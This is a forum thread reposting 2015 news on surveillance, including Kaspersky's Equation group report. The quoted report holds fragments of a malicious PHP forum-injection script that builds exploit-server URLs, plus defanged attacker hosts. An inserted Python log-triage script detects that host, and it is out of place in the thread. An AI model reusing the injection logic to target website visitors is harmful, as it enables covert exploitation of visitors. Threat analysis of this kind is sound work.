
they know what you are doing

Started by sky otter, June 09, 2013, 03:23:42 PM


zorgon


space otter


Apple Wants To Beam Your Fingerprint To New Devices



The Huffington Post    |  By  Damon Beres   
Posted:  01/15/2015 4:14 pm EST    Updated:  18 minutes ago



pic
A new patent suggests Apple might put your fingerprint data in the cloud. | US Patent And Trademark Office




Apple may be envisioning a world where buying a latte is as easy as holding up your index finger.

A patent application published online Thursday by the United States Patent and Trademark Office would allow the iPhone maker to share your fingerprint data between devices via the cloud.

Apple already uses fingerprint technology in Touch ID, which allows individuals to unlock their phones and iPads with a fingerprint. The process is supposedly more secure and convenient than typing in a password.

The new patent, which Apple has not officially been granted, extends this idea to cover uploading and storing fingerprint data. The patent describes downloading fingerprint data to a second device after it's been collected. That second device would have a biometric sensor of its own, which it would use to match the fingerprint data you've already offered.

It's an appealing idea because, in theory, your fingerprint could be associated with a profile including relevant information and settings. Perhaps you could easily set up a new iPhone to make it feel like your old device with the touch of your fingerprint. The patent also suggests that vendors equipped with touch devices could charge you for products -- like coffee -- using your fingerprint.

Apple Pay already lets you buy things using your fingerprint on your own device, but the new patent opens the door to making purchases without pulling anything out of your pocket. It's possible you could just touch a vendor's iPad or iPhone instead.

The patent seems to represent something of a reversal from Apple's current status quo with Touch ID. When the fingerprint scanner made its debut in 2013, the company explicitly stated that an individual's fingerprint data is "never stored on Apple servers, and it's never backed up to iCloud or anywhere else." The new patent, which covers a cloud computing device capable of "uploading and storing the enrollment finger biometric data," would seem to be a different approach.

A representative for Apple told The Huffington Post via email that the company does not comment on patents. Some experts and politicians have expressed concern over the idea of storing fingerprint data.

When Touch ID was first announced, Sen. Al Franken (D-Minn.) said he was worried about security, noting that compromised fingerprints could spell disaster for individuals -- you can get a new credit card, but you can't exactly replace your fingerprints.

"There is an additional security concern. Someone could steal your credentials. If hackers steal credit card numbers, they can steal fingerprints," Bruce Schneier, a security technologist, told HuffPost via phone.
However, Schneier noted an important point: Apple doesn't store an image of your actual fingerprint. Instead, the company uses a "mathematical representation" of your fingerprint. In other words, hackers wouldn't be able to lift a picture of your fingerprint, but they could perhaps take the data that represents it.

Still, Apple has said not to worry.

"It isn't possible for someone to reverse engineer your actual fingerprint image from this mathematical representation," Apple says.

Hackers aside, fingerprint data can spell trouble in another way: You can't conveniently "forget" it. A judge recently ruled that cops can force you to unlock your phone using your fingerprints, even though they can't ask for your password.



http://www.huffingtonpost.com/2015/01/15/apple-fingerprint_n_6480088.html


Ellirium113

Shocking: CIA clears CIA in Senate hacking brouhaha

Quote: The five officers involved in the CIA monitoring of computers Senate staffers used while probing the intelligence agency's torture program acted in good faith and committed no wrongdoing. That's according to a Wednesday report from an "accountability board" in which three of its five members are CIA officials.

The review board concluded there was simply a misunderstanding, that the CIA believed it could search the computers being used by staffers of the Senate Select Committee on Intelligence. National security was at stake, too.

"The Board determined that while an informal understanding existed that SSCI work product should be protected, no common understanding existed about the roles and responsibilities in the case of a suspected security incident," according to its highly redacted report [PDF] released Wednesday. The review said that the CIA's position was that it had "obligations under the National Security Act" and a legal duty to scour the computers "for the presence of Agency documents to which SSCI staff should not have access."

Sen. Dianne Feinstein (D-CA) chaired the intelligence committee last year when the breaches occurred, and the politician said she was "disappointed that no one at the CIA will be held accountable."

Feinstein said the decision "was made to search committee computers, and someone should be found responsible for those actions."

http://arstechnica.com/tech-policy/2015/01/shocking-cia-clears-cia-in-senate-hacking-brouhaha/

It's ok...if they WERE found guilty they would also be prosecuted by the CIA.  :P  ;D

zorgon

Family history is in our DNA. What's in yours?

Ancestry.com wants you to send them a DNA sample so to better compare you with your ancestors when searching... and it will only cost you $99.00

::)

Get personalized details about your ethnic origins. Discover more about your story with advanced DNA science from the experts in family history.
Now $99


SOURCE

Okay so wait a second... They have DNA records of your ancestors on file?

Is ANYONE actually falling for this?



space otter

yes..well I've been doing some personal genealogy and have found that ancestry dot com has the market pretty much controlled.. and all for various price ranges
so I have been going around them as much as possible and have found quite a bit of info
that I was totally surprised by..man more relatives than I thought possible

anywho that is all besides the point of just who is ancestry  dot com
with a little digging it sounds a lot like someone else I just profiled

trust is just a hard thing anymore..ain't it.....sigh

oh yeah and after every day's searching I run a scan and usually remove tons of tracking cookies
pisses me off totally..grrrrrrrr













Ancestry.com Reportedly Agrees To $1.6 Billion Buyout
www.huffingtonpost.com/.../ancestry-deal_n_1999007...
The Huffington Post

Ancestry.com Reportedly Agrees To $1.6 Billion Buyout
Reuters
Posted: 10/22/2012 2:03 am EDT Updated: 10/21/2013 4:59 am EDT





(Reuters) - An investor group led by private equity firm Permira Advisers LLP has agreed to buy genealogy website Ancestry.com Inc for about $1.6 billion, or $32 a share, the Wall Street Journal reported, citing people familiar with the deal.

In addition to Permira, the buyout group includes the private equity firm's co-investors, members of Ancestry.com's management, including Chief Executive Tim Sullivan and Chief Financial Officer Howard Hochhauser, and Spectrum Equity, which owns about 30 percent of Ancestry.com, the Journal said.

Provo, Utah-based Ancestry, whose website helps users trace their family roots by scouring online records, and Permira Advisers, could not immediately be reached for comment outside regular U.S. business hours.

Shares of Ancestry.com closed at $29.18 Friday on the Nasdaq.


Ancestry received offers from the three private equity firms in August and none of the bidders met the company's price expectations at the time, sources familiar with the matter previously told Reuters.

(Reporting by Sakthi Prasad; additional reporting by Vrinda Manocha in Bangalore; Editing by Louise Heavens)
.......


History

Founded in 1993 by Brion Applegate and William Collatos, Spectrum Equity raised its first fund in May 1994. Applegate had been a general partner of funds managed by Burr, Egan, Deleage, & Co.[3] Collatos began his private equity career at TA Associates where he was a general partner before leaving to become a founding general partner of its spin-off, Media Communications Partners.[4] Spectrum Equity has raised seven private equity funds since its founding, totaling $5.7[1] billion of capital.
From Wikipedia, the free encyclopedia



Spectrum Equity

Type: Private
Industry: Private Equity, Growth Equity
Founded: 1994
Headquarters: Boston, Massachusetts, U.S.; San Francisco, California, U.S.
Products: Growth capital, Recapitalizations
Total assets: $5.7 billion
Website: www.spectrumequity.com

Spectrum Equity is a growth equity firm, investing in businesses focused on the information economy. The firm's partners have worked together for an average of 15 years,[1] leading a team operating out of offices in Boston, MA and San Francisco, CA. The firm's sectors of focus include: Software & Information Services; Internet & Digital Media; and Communications, Media & Entertainment. Spectrum Equity seeks out companies which have defensible and sustainable business models with strong recurring revenue, significant operating leverage, strong cash flow margins, and franchise customer loyalty.[2] Typical equity investments range from $25 – $100 million,[1] and the firm is comfortable as either a minority or majority owner in companies. Spectrum Equity has invested in companies that are category leaders across North America, Western Europe, and Australia.

In addition to providing equity capital for growth and liquidity, Spectrum Equity plays a prominent role in helping its portfolio companies in the implementation of their business plans. As members of the board of directors for each of their portfolio companies, the Spectrum Equity team helps with strategic decisions, capital market transactions, recruitment of talent, the identification of acquisitions, and product initiatives.


....................



Permira | Investing in growth | Private Equity with Global ...
www.permira.com/

Founded in 1985, Permira is a European private equity firm with global reach. The firm advises funds with a committed capital of approximately €20 billion.

Permira is a European private equity firm, founded in 1985. The firm advises funds with a total committed capital of approximately €20 billion. Since 1985 the Permira funds, raised from pension funds and other institutions, have made nearly 200 private equity investments.

Permira specialises in five sectors: Consumer, Financial Services, Healthcare, Industrials and TMT (Technology, Media, Telecommunications). There are currently 25 companies in the Permira funds' portfolio and the firm comprises approximately 120 professionals.

The firm's teams are based in Frankfurt, Guernsey, Hong Kong, London, Luxembourg, Madrid, Menlo Park, Milan, New York, Paris, Stockholm and Tokyo. Permira is led by two co-managing partners Kurt Björklund and Tom Lister.

The Social Business Trust
Permira is a founding partner of Social Business Trust (SBT), a social enterprise fund. Since launching in December 2010, SBT has made five investments - Women Like Us, The Challenge Network, Moneyline, the London Early Years Foundation and the Inspiring Futures Foundation. SBT is a partnership of six leading global companies (Bain & Co, Clifford Chance, Credit Suisse, Ernst & Young, Permira and Thomson-Reuters) dedicated to transforming social enterprises by providing £10m of growth capital and skilled support


well yes of course I will send you my dna..  NOT





:(      >:(     :-X 


seems a lot of money is being spent on herding the sheeple....wonder why 




damn I can't seem to stop looking stuff up...I think I need a nap and maybe this bug will go away

there's more.. there is always more




http://kcpw.org/blog/the-bottom-line/2014-07-08/tim-sullivan-ancestry-com-president-ceo/

The Bottom Line: Ancestry.com President & CEO, Tim Sullivan

Ross 07/8/2014 7 Comments


The Bottom Line (Air Date: July 8, 2014) – Utah-based Ancestry.com is the world's largest online family history resource. Under Tim Sullivan's leadership, Ancestry.com has grown to over 2.7 million paying subscribers, and generates more than a half a billion dollars a year in revenue. It was recently sold to a private equity firm for $1.6 billion. Sullivan talks about Ancestry.com's DNA service that helps people learn their ethnic makeup and connects them to their deep genealogical past. He also explains how Ancestry.com has tried to make family history research easier while not alienating serious genealogy researchers. Sullivan shares his journey from the University of North Carolina with a Morehead Scholarship and his early interest in documentary film-making. He later worked for Disney's home video division, then for Disney in Hong Kong, and later transitioned to Ticketmaster-City Search. Sullivan talks about Ancestry.com's 2013 $60 million partnership with the LDS Church to bring over one billion historical documents online.



podcast at link





http://www.glassdoor.com/Overview/Working-at-Ancestry-com-EI_IE243532.11,23.htm




.......... I think it's January cabin fever.....yikes











but to prove that I really am an optimist.. I'm off to go thru the pile of seed catalogs
with that song as an ear worm today


space otter


http://www.huffingtonpost.com/2015/01/27/snowden-regin-spy_n_6559520.html




New Snowden Findings Suggest Cyber-Espionage Program Used By Several Countries



Reuters 
  Posted:  01/27/2015 9:29 pm EST    Updated:  1 hour ago

SAN FRANCISCO, Jan 27 (Reuters) - A program used by U.S. and British spies to record computer keystrokes was part of sophisticated hacking operations in more than a dozen countries, security experts said on Tuesday, after former NSA contractor Edward Snowden reportedly leaked the source code for the program.

On Tuesday, researchers at security software firm Kaspersky Lab said that much of that code, published this month by German magazine Spiegel, matched what they previously found in machines infected by Regin, a major suite of spying tools exposed in November.

Lead Kaspersky researcher Costin Raiu said that the keylogging program, called Qwerty, would work only with Regin, and that it appeared several Western countries' spies had been using Regin over the course of a decade.
"Multiple attacker groups are using the Regin platform, which is a new conclusion for us," Raiu told Reuters.

Spiegel and other publications reported earlier that Regin had been used in the hacking of Belgian telecommunications provider Belgacom, which slides provided by Snowden said was targeted to enable spying on mobile phones in Europe.

Overall, the malicious software has been discovered at more than two dozen sites in 14 countries, including Russia, India, Germany and Brazil. Targets included government agencies, financial institutions and multilateral bodies.

The NSA did not respond to a request for comment. After past Snowden disclosures, it has avoided discussing specific operations but said it complies with U.S. law, which allows broad surveillance overseas.

The new findings suggest that Regin was a platform for spying operations that was shared among the so-called Five Eyes—the United States, United Kingdom, Canada, Australia, and New Zealand.

In its own November report on Regin, top U.S. antivirus company Symantec Corp said it was extraordinarily well disguised, and that even when traces were found it was difficult to know the purpose. Like some other top-tier spying programs, Regin has different modules that can be installed to achieve different ends.

Symantec said it found victims in the telecom industry as well as energy, airline and research concerns.

(Reporting by Joseph Menn; Editing by Christian Plumb)



space otter



NSA Has Ability To Hide Spying Software Deep Within Hard Drives: Cyber Researchers



Reuters    |  By Joseph Menn 
  Posted:  02/16/2015 7:39 pm EST    Updated:  15 minutes ago


SAN FRANCISCO, Feb 16 (Reuters) - The U.S. National Security Agency has figured out how to hide spying software deep within hard drives made by Western Digital, Seagate, Toshiba and other top manufacturers, giving the agency the means to eavesdrop on the majority of the world's computers, according to cyber researchers and former operatives.

That long-sought and closely guarded ability was part of a cluster of spying programs discovered by Kaspersky Lab, the Moscow-based security software maker that has exposed a series of Western cyberespionage operations.

Kaspersky said it found personal computers in 30 countries infected with one or more of the spying programs, with the most infections seen in Iran, followed by Russia, Pakistan, Afghanistan, China, Mali, Syria, Yemen and Algeria. The targets included government and military institutions, telecommunication companies, banks, energy companies, nuclear researchers, media, and Islamic activists, Kaspersky said. (http://reut.rs/1L5knm0)

The firm declined to publicly name the country behind the spying campaign, but said it was closely linked to Stuxnet, the NSA-led cyberweapon that was used to attack Iran's uranium enrichment facility. The NSA is the U.S. agency responsible for gathering electronic intelligence.

A former NSA employee told Reuters that Kaspersky's analysis was correct, and that people still in the spy agency valued these espionage programs as highly as Stuxnet. Another former intelligence operative confirmed that the NSA had developed the prized technique of concealing spyware in hard drives, but said he did not know which spy efforts relied on it.

NSA spokeswoman Vanee Vines said the agency was aware of the Kaspersky report but would not comment on it publicly.

Kaspersky published the technical details of its research on Monday, a move that could help infected institutions detect the spying programs, some of which trace back as far as 2001. (http://bit.ly/17bPUUe)

The disclosure could hurt the NSA's surveillance abilities, already damaged by massive leaks by former contractor Edward Snowden. Snowden's revelations have upset some U.S. allies and slowed the sales of U.S. technology products abroad.

The exposure of these new spying tools could lead to greater backlash against Western technology, particularly in countries such as China, which is already drafting regulations that would require most bank technology suppliers to proffer copies of their software code for inspection.

Peter Swire, one of five members of U.S. President Barack Obama's Review Group on Intelligence and Communications Technology, said the Kaspersky report showed that it is essential for the country to consider the possible impact on trade and diplomatic relations before deciding to use its knowledge of software flaws for intelligence gathering.

"There can be serious negative effects on other U.S. interests," Swire said.



TECHNOLOGICAL BREAKTHROUGH


According to Kaspersky, the spies made a technological breakthrough by figuring out how to lodge malicious software in the obscure code called firmware that launches every time a computer is turned on.

Disk drive firmware is viewed by spies and cybersecurity experts as the second-most valuable real estate on a PC for a hacker, second only to the BIOS code invoked automatically as a computer boots up.

"The hardware will be able to infect the computer over and over," lead Kaspersky researcher Costin Raiu said in an interview.

Though the leaders of the still-active espionage campaign could have taken control of thousands of PCs, giving them the ability to steal files or eavesdrop on anything they wanted, the spies were selective and only established full remote control over machines belonging to the most desirable foreign targets, according to Raiu. He said Kaspersky found only a few especially high-value computers with the hard-drive infections.

Kaspersky's reconstructions of the spying programs show that they could work in disk drives sold by more than a dozen companies, comprising essentially the entire market. They include Western Digital Corp, Seagate Technology Plc, Toshiba Corp, IBM, Micron Technology Inc and Samsung Electronics Co Ltd.

Western Digital, Seagate and Micron said they had no knowledge of these spying programs. Toshiba and Samsung declined to comment. IBM did not respond to requests for comment.


GETTING THE SOURCE CODE


Raiu said the authors of the spying programs must have had access to the proprietary source code that directs the actions of the hard drives. That code can serve as a roadmap to vulnerabilities, allowing those who study it to launch attacks much more easily.

"There is zero chance that someone could rewrite the [hard drive] operating system using public information," Raiu said.

Concerns about access to source code flared after a series of high-profile cyberattacks on Google Inc and other U.S. companies in 2009 that were blamed on China. Investigators have said they found evidence that the hackers gained access to source code from several big U.S. tech and defense companies.

It is not clear how the NSA may have obtained the hard drives' source code. Western Digital spokesman Steve Shattuck said the company "has not provided its source code to government agencies." The other hard drive makers would not say if they had shared their source code with the NSA.

Seagate spokesman Clive Over said it has "secure measures to prevent tampering or reverse engineering of its firmware and other technologies." Micron spokesman Daniel Francisco said the company took the security of its products seriously and "we are not aware of any instances of foreign code."

According to former intelligence operatives, the NSA has multiple ways of obtaining source code from tech companies, including asking directly and posing as a software developer. If a company wants to sell products to the Pentagon or another sensitive U.S. agency, the government can request a security audit to make sure the source code is safe.

"They don't admit it, but they do say, 'We're going to do an evaluation, we need the source code,'" said Vincent Liu, a partner at security consulting firm Bishop Fox and former NSA analyst. "It's usually the NSA doing the evaluation, and it's a pretty small leap to say they're going to keep that source code."

The NSA declined to comment on any allegations in the Kaspersky report. Vines said the agency complies with the law and White House directives to protect the United States and its allies "from a wide array of serious threats."

Kaspersky called the authors of the spying program "the Equation group," named after their embrace of complex encryption formulas.

The group used a variety of means to spread other spying programs, such as by compromising jihadist websites, infecting USB sticks and CDs, and developing a self-spreading computer worm called Fanny, Kaspersky said.

Fanny was like Stuxnet in that it exploited two of the same undisclosed software flaws, known as "zero days," which strongly suggested collaboration by the authors, Raiu said. He added that it was "quite possible" that the Equation group used Fanny to scout out targets for Stuxnet in Iran and spread the virus.



(Reporting by Joseph Menn; Editing by Tiffany Wu)

http://www.huffingtonpost.com/2015/02/16/nsa-computer-spying_n_6694736.html

ArMaP

Some snippets from the Kaspersky PDF at http://bit.ly/17bPUUe that I find interesting, with the most interesting (for me) parts marked in yellow:

Quote: The main purpose of Fanny appears to have been the mapping of air-gapped networks. For this, it used a unique USB-based command and control mechanism. When a USB stick is infected, Fanny creates a hidden storage area on the stick. If it infects a computer without an internet connection, it will collect basic system information and save it onto the hidden area of the stick. Later, when a stick containing hidden information is plugged into an internet-connected computer infected by Fanny, the data will be scooped up from the hidden area and sent to the C&C. If the attackers want to run commands on the air-gapped networks, they can save these commands in the hidden area of the USB stick. When the stick is plugged into the air-gapped computer, Fanny will recognize the commands and execute them. This effectively allowed the Equation group to run commands inside air-gapped networks through the use of infected USB sticks, and also map the infrastructure of such networks.

Quote: The Equation group relies on multiple techniques to infect their victims. These include:
•     Self-replicating (worm) code – Fanny
•     Physical media, CD-ROMs
•     USB sticks + exploits
•     Web-based exploits
The attacks that use physical media (CD-ROMs) are particularly interesting because they indicate the use of a technique known as "interdiction", where the attackers intercept shipped goods and replace them with Trojanized versions.

One such incident involved targeting participants at a scientific conference in Houston. Upon returning home, some of the participants received by mail a copy of the conference proceedings, together with a slideshow including various conference materials. The [compromised ?] CD-ROM used "autorun.inf" to execute an installer that began by attempting to escalate privileges using two known EQUATION group exploits. Next, it attempted to run the group's DOUBLEFANTASY implant and install it onto the victim's machine. The exact method by which these CDs were interdicted is unknown. We do not believe the conference organizers did this on purpose. At the same time, the super-rare DOUBLEFANTASY malware, together with its installer with two zero-day exploits, don't end up on a CD by accident.

Another example is a Trojanized Oracle installation CD that contains an EQUATIONLASER Trojan dropper alongside the Oracle installer.

Quote: With threat actor groups as skilled as the Equation team, mistakes are rare. Nevertheless, they do happen. Some of the keywords forgotten in the modules that we analyzed include:
•     SKYHOOKCHOW
•     prkMtx – unique mutex used by the Equation group's exploitation library ("PrivLib")
•     "SF" – as in "SFInstall", "SFConfig"
•     "UR", "URInstall" – "Performing UR-specific post-install..."
•     "implant" – from "Timeout waiting for the "canInstallNow" event from the implant-specific EXE!"
•     STEALTHFIGHTER – (VTT/82055898/STEALTHFIGHTER/2008-10-16/14:59:06.229-04:00)
•     DRINKPARSLEY –  (Manual/DRINKPARSLEY/2008-09-30/10:06:46.468-04:00)
•     STRAITACID –  (VTT/82053737/STRAITACID/2008-09-03/10:44:56.361-04:00)
•     LUTEUSOBSTOS –  (VTT/82051410/LUTEUSOBSTOS/2008-07-30/17:27:23.715-04:00)
•     STRAITSHOOTER STRAITSHOOTER30.exe
•     DESERTWINTER –  c:\desert~2\desert~3\objfre_w2K_x86\i386\DesertWinterDriver.pdb
•     GROK – standalonegrok_2.1.1.1
•     "RMGREE5" – c:\users\rmgree5\...

Quote: Note: The codename GROK appears in several documents published by Der Spiegel, where "a keylogger" is mentioned. Our analysis indicates EQUATIONGROUP's GROK plugin is indeed a keylogger on steroids that can perform many other functions.

Quote: Victims generally fall into the following categories:
•     Governments and diplomatic institutions
•     Telecommunication
•     Aerospace
•     Energy
•     Nuclear research
•     Oil and gas
•     Military
•     Nanotechnology
•     Islamic activists and scholars
•     Mass media
•     Transportation
•     Financial institutions
•     Companies developing cryptographic technologies

Quote: All the malware we have collected so far is designed to work on Microsoft's Windows operating system. However, there are signs that non-Windows malware does exist. For instance, one of the sinkholed C&C domains is currently receiving connections from a large pool of victims in China that appear to be Mac OS X computers (based on the user-agent).

The malware callbacks are consistent with the DOUBLEFANTASY schema, which normally injects into the system browser (for instance, Internet Explorer on Windows).

The callbacks for the suspected Mac OS X versions have the following user agents:
•     Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/536.26.17 (KHTML, like Gecko) Version/6.0.2 Safari/536.26.17
•     Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0
•     Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/536.28.10 (KHTML, like Gecko) Version/6.0.3 Safari/536.28.10

This leads us to believe that a Mac OS X version of DOUBLEFANTASY also exists.

Additionally, we observed that one of the malicious forum injections, in the form of a PHP script, takes special precautions to show a different type of HTML code to Apple iPhone visitors. Unlike other cases, such as visitors from Jordan, which does not get targeted, iPhone visitors are redirected to the exploit server, suggesting the ability to infect iPhones as well.

Quote: On March 2, 2013, a Kaspersky Lab user browsing an online forum was attacked with an exploit from one of the Equation group's exploitation servers:

2013-03-02 –  technicalconsumerreports[.]com/modular/assemble.php?params=YoGKKdExT[snip]cS5kS5t0bvGQyB8miDu+Agn – detected HEUR:Exploit.Script.Generic

The attack was unsuccessful as it was caught by our product and the user was protected. The attack was targeting Firefox 17 (TOR Browser), using an unknown exploit that we have not recovered.
Looking further, we identified a few other known Equation servers used in similar attacks even earlier:

2012-12-11 –  technology-revealed[.]com/diagram/navigate.html?overlay=AL[snip]OISn6sI1&sn=d1[SNIP]dd

These attacks were delivered in several ways – for example, while the user visited a number of Islamic Jihadist discussion forums, or via advertisements on popular websites in the Middle East.

The forums in question appear to have been compromised by a specific PHP script that exploited only authenticated visitors.

Quote: In practice, this means that only logged-in users will be exploited. Next, the PHP exploitation script checks if the user comes from a specific address range:
•     if(preg_match('/^(64.38.3.50|195.28.|94.102.|91.93.|41.130.|212.118.|79.173.|85.159.|94.249.|86.108.)/',IPADDRESS)){return "";}

Converting the ranges to their respective countries (except for 64.38.3.50, which is the only specific IP mentioned) we get the following TOP 3 countries that will NOT be exploited:
1.  Jordan
2.  Turkey
3.  Egypt

This means that the attackers have taken special care not to infect users visiting from certain ISPs in these countries. If the visitors are from any other IP range, the PHP script constructs an exploitation URL which includes the logged in vBulletin forum name:

$htt="http://technology-revealed[.]com/expand/order.php?design=ABRSRgDQlkUALAxGANDrRu
QQofe6Y0THS8E3hfBC+M+k7CdBmTH5gAkLvgV8EV3ULW+7KoUjbJ4UOFU6SVOtgEK7zTgPPNoDH
z4vKecDGe7OzDmJlvwKvc5uYg/I/5x9";

$htt=$htt."&sn=".bin2hex(substr($u,0,14));

The vBulletin forum username is stored in hex, as the "sn=" parameter to the exploit site. The exploit site can choose to hit the visitor with an exploit depending on the username, meaning that the attackers are taking great care to infect only very specific targets on these forums.

Interestingly, the PHP script produces a different HTML page for iPhone visitors:
•     if (preg_match('/iPhone/',$_SERVER['HTTP_USER_AGENT'])){$scroll='yes';}

This indicates that the exploit server is probably aware of iPhone visitors and can deliver exploits for them as well; otherwise, the exploitation URL can simply be removed for these visitors.

Most recently, the attackers used Java exploits, delivered through a specific server to visitors from the Middle East via advertising networks on popular websites.
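A defender-side sketch of the "sn=" encoding described in the quoted analysis above, added here as an example and not part of the original post or the quoted report: it scans proxy log lines for requests to the named host, decodes the hex forum name, and reuses the quoted skip-list pattern to mark clients the script should never have redirected. The log format, sample lines, usernames and function names are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Host named in the quoted report, kept defanged in source and refanged at runtime.
WATCH_HOSTS = {h.replace("[.]", ".") for h in ("technology-revealed[.]com",)}

# Skip-list pattern copied verbatim from the quoted PHP line (dots left unescaped
# exactly as in the original script).
SKIP_RE = re.compile(
    r"^(64.38.3.50|195.28.|94.102.|91.93.|41.130.|212.118.|79.173.|85.159.|94.249.|86.108.)"
)

# bin2hex(substr($u,0,14)) yields lowercase hex for at most 14 bytes (28 hex chars).
HEX_RE = re.compile(r"^(?:[0-9a-f]{2}){1,14}$")


def decode_sn(value):
    """Return the forum-name prefix carried in sn=, or None if it is not bin2hex output."""
    if not HEX_RE.match(value):
        return None
    return bytes.fromhex(value).decode("utf-8", errors="replace")


def on_skip_list(ip):
    """True if the quoted script would have returned early for this client address."""
    return SKIP_RE.match(ip) is not None


def triage(log_lines):
    """Each line is '<client_ip> <url>' (constructed format). Returns one dict per hit."""
    hits = []
    for line in log_lines:
        ip, _, url = line.strip().partition(" ")
        parts = urlsplit(url.replace("[.]", "."))
        if parts.hostname not in WATCH_HOSTS:
            continue
        for value in parse_qs(parts.query, keep_blank_values=True).get("sn", []):
            name = decode_sn(value)
            if name is None:
                continue
            hits.append({
                "client": ip,
                "path": parts.path,
                "forum_name": name,
                # A hit from a skip-listed address contradicts the script's logic
                # and deserves a closer look (proxy, NAT, or a different injector).
                "skip_listed": on_skip_list(ip),
            })
    return hits


# Constructed sample log lines; addresses, usernames and design/overlay values are made up.
SAMPLE_LOG = [
    "203.0.113.7 http://technology-revealed[.]com/expand/order.php?design=AAAA&sn=666f72756d5f75736572",
    "94.102.10.20 http://technology-revealed[.]com/diagram/navigate.html?overlay=AAAA&sn=61646d696e",
    "203.0.113.8 http://technology-revealed[.]com/expand/order.php?design=AAAA&sn=d1zz",
    "198.51.100.9 http://example.org/search?q=x&sn=42",
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG):
        print(hit)
```
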

space otter




NSA, British Spies Hacked SIM Card Maker, Had Access To Billions Of Phones: Report



Reuters    |  By Eric Auchard 
   Posted:  02/20/2015 10:56 am EST    Updated:  02/21/2015 8:59 am EST

* U.S., UK spies hacked SIM card maker Gemalto's system -Intercept

* News website cites documents from Edward Snowden

* Says gave spies ability to monitor calls on billions of phones

* Franco-Dutch firm Gemalto says it is investigating report (Adds information from European security source)

By Eric Auchard

FRANKFURT, Feb 20 (Reuters) - U.S. and British spies hacked into the world's biggest maker of phone SIM cards, allowing them to potentially monitor the calls, texts and emails of billions of mobile users around the world, an investigative news website reported.

The alleged hack on Gemalto, if confirmed, would expand the scope of known mass surveillance methods available to U.S. and British spy agencies to include not just email and web traffic, as previously revealed, but also mobile communications.

The Franco-Dutch company said on Friday it was investigating whether the U.S. National Security Agency (NSA) and Britain's GCHQ had hacked into its systems to steal encryption keys that could unlock the security settings on billions of mobile phones.

The report by The Intercept site, which cites documents provided by former NSA contractor Edward Snowden, could prove an embarrassment for the U.S. and British governments. It opens a fresh front in the dispute between civil liberties campaigners and intelligence services which say their citizens face a grave threat of attack from militant groups like Islamic State.

It comes just weeks after a British tribunal ruled that GCHQ had acted unlawfully in accessing data on millions of people in Britain that had been collected by the NSA.

The Intercept report (http://bit.ly/19E0KUK) said the hack was detailed in a secret 2010 GCHQ document and allowed the NSA and GCHQ to monitor a large portion of voice and data mobile communications around the world without permission from governments, telecom companies or users.

"We take this publication very seriously and will devote all resources necessary to fully investigate and understand the scope of such sophisticated techniques," said Gemalto, whose shares sunk by as much as 10 percent in early trading on Friday, following the report.

The report follows revelations from Snowden in 2013 of the NSA's Prism program which allowed the agency to access email and web data handled by the world's largest Internet companies, including Google, Yahoo and Facebook.

A spokeswoman for Britain's GCHQ (Government Communication Headquarters) said on Friday that it did not comment on intelligence matters. The NSA could not be immediately reached for comment.

A European security source said that mobile devices were widely used by terrorist groups and that intelligence agencies' attempts to access the communications were justified if they were "authorized, necessary and proportionate." The source did not confirm or deny that the documents were from GCHQ.

The source also said Western agencies would sometimes hold on to data over time in order to decrypt the communications of specific intelligence targets.

The source added that wireless networks in Iran, Afghanistan and Yemen were viewed as having significant intelligence value. These were identified by the Intercept as countries where Britain's GCHQ intercepted encryption keys used by local wireless network providers.


SURVEILLANCE

The new allegations could boost efforts by major technology firms such as Apple Inc and Google to make strong encryption methods standard in communications devices they sell, moves attacked by some politicians and security officials.

Leaders including U.S. President Barack Obama and British Prime Minister David Cameron have expressed concern that turning such encryption into a mass-market feature could prevent governments from tracking militants planning attacks.

Gemalto makes SIM (Subscriber Identity Module) cards for phones and tablets as well as "chip and pin" bank cards and biometric passports. It produces around 2 billion SIM cards a year and counts Verizon, AT&T Inc and Vodafone among hundreds of wireless network provider customers.

The European security source said that an assertion by The Intercept that GCHQ had taken control of Gemalto's internal network was speculative and not supported by documentation published by the website.

The Intercept, published by First Look Media, was founded by the journalists who first interviewed Snowden and made headlines around the world with reports on U.S. electronic surveillance programs.

It published what it said was a secret GCHQ document that said its staff implanted software to monitor Gemalto's entire network, giving them access to SIM card encryption keys. The report suggested this gave GCHQ, with the backing of the NSA, unlimited access to phone communications using Gemalto SIMs.

French bank Mirabaud said in a research report the attacks appeared to be limited to 2010 and 2011 and were aimed only at older 2G phones widely used in emerging markets, rather than modern smartphones. It did not name the source of these assertions.

Some analysts argued that if a highly security-conscious company like Gemalto is vulnerable, then all of its competitors are as well.

Gemalto competes with several European and Chinese SIM card suppliers. A spokesman for one major rival, Giesecke & Devrient of Germany, told Reuters: "We have no signs that something like that happened to us. We always do everything to protect our customers' data."

But while security experts have long believed spy agencies in many countries have the ability to crack the complex mathematical codes used to encrypt most modern communications, such methods remain costly, limiting their usefulness to targeted hijacking of individual communications.


(Additional reporting by Abhirup Roy and Supantha Mukherjee in Bengaluru; Leigh Thomas, Cyril Altmeyer, Blaise Robinson and Nicholas Vinocur in Paris; Mark Hosenball in Washington; Jens Hack in Munich; and Harro ten Wolde in Frankfurt; Editing by Andrew Callus and Pravin Char)

space otter

http://www.latimes.com/nation/nationnow/la-na-nn-cia-cyber-espionage-20150305-story.html#page=1


CIA to create a digital spy division



March 6, 2015, 6:51 PM|Reporting from Langley, Va.




After more than a decade of hunting terrorists, stopping plots and scrambling from crisis to crisis, the CIA has concluded it has been outflanked and outwitted on a critical front: digital tradecraft.

On Friday, the CIA acknowledged that it was time to move into the 21st century, saying it was creating a special division to conduct cyberespionage.

Along with crunching data to help identify and approach new spies to recruit, the CIA hopes to improve its ability to trace the "digital dust" that potential targets leave during activities such as using an ATM card, renting a car or moving through a city with a cellphone.

Rival spy agencies use those digital fingerprints to help track CIA operatives, and the agency wants to find techniques to help officers working undercover hide their tracks online.
"The digital world touches every aspect of our business," CIA Director John O. Brennan told reporters at CIA headquarters here. He acknowledged that the agency had been slow to adapt to the challenge.

The restructuring at the CIA comes after U.S. intelligence was caught off-guard by a series of high-profile digital attacks, including North Korea's destruction of computer systems at Sony Pictures and an Iranian-launched cyberassault on Las Vegas Sands Corp., the world's largest casino company, both last year.

James R. Clapper, the director of national intelligence, warned Congress last month that cyberattacks posed a greater long-term threat to national security than terrorism.

